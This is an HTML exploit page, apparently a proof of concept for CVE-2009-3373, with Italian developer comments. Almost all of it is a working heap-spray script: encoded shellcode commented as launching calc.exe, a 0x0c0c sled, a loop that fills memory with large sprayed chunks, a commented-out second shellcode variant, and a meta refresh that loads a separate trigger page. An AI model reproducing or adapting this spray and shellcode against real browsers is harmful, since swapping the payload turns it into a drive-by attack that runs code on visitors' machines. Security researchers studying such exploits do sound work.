CVE_2009_3373.htm

<html>
<head>
<meta http-equiv="refresh" content="1;url=trigger.htm">
<script>
 //alert('ready to spray lol'); 

// calc.exe shellcode
var shellcode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");

var ret = unescape("%0c0c%u0c0c");
//var ret = unescape("%u9090%u9090");

var chunksize = 0x100000;
var chunknumber = 0x3A;

//ret iniziale lunghezza 2 e devo assicurarmi che non superi chunksize
while(ret.length < (chunksize - (shellcode.length*2) - 8)) ret += unescape("%u0c0c%u0c0c");  

//var payload = ret + shellcode + ret + shellcode + ret + shellcode + ret + shellcode;
var payload = ret + shellcode;

payload = payload.substring(0, payload.length);

//alert(payload.length)

//heap = new Array();
heap = [];

//alert("ano");

for(i = 0; i < chunknumber; i++)
{
	heap[i] = [payload].join("");
	//heap[i] = payload.substring(0, payload.length);
	//var test = heap[i];
	//alert("Sprayed " + i + " di lunghezza " + test.length);
}


 /*

//test

for(S="\u0a0a",k=[],y=0;y++<300;)y<20?S+=S:k[y]=[S.substr(50)+"\uf631\u6456\u768b\u8b30\u0c76\u768b\u8b1c\u086e\u368b\u5d8b\u8b3c\u1d5c\u0178\u8beb\u184b\u7b8b\u0120\u8bef\u8f7c\u01fc\u31ef\u99c0\u1732\uc166\u01ca\u75ae\u66f7\ufa81\uf510\ue2e0\ucf75\u538b\u0124\u0fea\u14b7\u8b4a\u1c7b\uef01\u2c03\u6897\u652e\u6578\u6368\u6c61\u5463\u0487\u5024\ud5ffÌ"].join("")


alert("Sprayed automtic");
*/

/*var c = document.createElement("img");
c.src = "06.gif";

var a = document.createElement("img");
 a.src = "0a.gif";*/


//var b1 = document.createElement("img");
//b1.src = "0c.gif";

</script>
</head>

<body>
<!--<img src="a_original.gif">-->
<!--<img src="a.gif">-->
<img src="0c.gif">
</body>
</html>